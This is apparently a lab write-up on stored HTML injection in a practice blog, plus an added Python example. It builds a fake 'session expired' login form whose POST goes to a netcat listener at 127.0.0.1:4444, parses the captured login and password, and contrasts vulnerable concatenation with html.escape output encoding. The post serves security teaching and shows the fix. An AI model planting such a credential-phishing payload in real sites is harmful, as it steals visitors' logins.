HTML Injection - Stored (Blog)


For this vulnerability, consider a scenario where the blog stores a comment or some other text message submitted by users and displays it back to everyone who views the blog.

The blog entry shows that the user teck submitted the text “test” at 15:21:36 on 2018-02-02.
Let’s try basic HTML injection first: submit a comment containing a simple tag and check whether the blog renders it as markup instead of text.
It works: the tag is rendered, so the blog is echoing the stored comment into the page without encoding it.
Now let’s try with an <iframe>.
It works as well, so we can use this to trick users into “logging in” again through a page we control, and capture the credentials of every user who does. Because the injection is stored, every visitor who views the blog gets the fake login, not just our own session.
Payload (GitHub)
As soon as you submit the payload, the blog page shows a “session expired” message followed by a login form.
Now restart nc and start listening again; the next time any user logs in through that form, the submitted credentials will show up in the listener.
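To make the attack and the fix concrete, here is an added Python example; it is not from the original post or the GitHub payload it links to. It constructs a fake “session expired” login form of the kind described above (the post uses an iframe; this version inlines the form directly), renders it the way a vulnerable blog does (plain string concatenation) and the way a fixed one should (HTML entity encoding), and parses the raw POST a netcat listener would print. The listener address 127.0.0.1:4444, the table-row rendering, and the sample captured request are assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Hypothetical attacker listener, e.g. `nc -lvp 4444` on the attacker box.
ATTACKER = "http://127.0.0.1:4444/"

# Constructed example payload (not the post's GitHub payload): a full-page
# overlay that claims the session expired and POSTs the re-entered
# credentials to the attacker's listener instead of the real site.
PHISHING_PAYLOAD = (
    '<div style="position:fixed;top:0;left:0;width:100%;height:100%;'
    'background:#fff">'
    "<p>Your session has expired. Please log in again.</p>"
    f'<form action="{ATTACKER}" method="post">'
    'Login: <input name="login"><br>'
    'Password: <input name="password" type="password"><br>'
    '<input type="submit" value="Login">'
    "</form></div>"
)


def render_comment_vulnerable(author: str, text: str) -> str:
    """Stored comment rendered by plain concatenation (assumed layout):
    whatever markup the user submitted is emitted into the page verbatim."""
    return f"<tr><td>{author}</td><td>{text}</td></tr>"


def render_comment_safe(author: str, text: str) -> str:
    """Same rendering with output encoding: <, >, &, and quotes become
    entities, so the browser displays the payload as text instead of
    building a form out of it."""
    return f"<tr><td>{html.escape(author)}</td><td>{html.escape(text)}</td></tr>"


class _TagCollector(HTMLParser):
    """Records every start tag the HTML parser sees."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(rendered: str,
                  dangerous=("iframe", "form", "script", "img")) -> list:
    """Return the phishing/exfiltration-relevant tags a browser would
    actually create from the rendered HTML. Empty means the comment was
    neutralised."""
    parser = _TagCollector()
    parser.feed(rendered)
    return [t for t in parser.tags if t in dangerous]


def credentials_from_capture(raw_request: str) -> dict:
    """Pull the form fields out of the raw HTTP POST that a netcat
    listener prints when the victim submits the fake login form."""
    _head, _sep, body = raw_request.partition("\r\n\r\n")
    return {name: values[0] for name, values in parse_qs(body).items()}


if __name__ == "__main__":
    vulnerable = render_comment_vulnerable("teck", PHISHING_PAYLOAD)
    safe = render_comment_safe("teck", PHISHING_PAYLOAD)
    print("vulnerable rendering creates:", injected_tags(vulnerable))
    print("safe rendering creates:", injected_tags(safe))

    # Constructed sample of what the listener would show after a victim
    # submits the fake form.
    captured = (
        "POST / HTTP/1.1\r\n"
        "Host: 127.0.0.1:4444\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: 22\r\n"
        "\r\n"
        "login=bee&password=bug"
    )
    print("captured credentials:", credentials_from_capture(captured))
```

The fix is the one line of difference between the two render functions: encode on output. Encoding on input is not enough, because the same stored comment may later be rendered in other contexts (an admin page, an RSS feed, an e-mail notification) where different characters are dangerous.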

~ Hack the World and Stay Noob

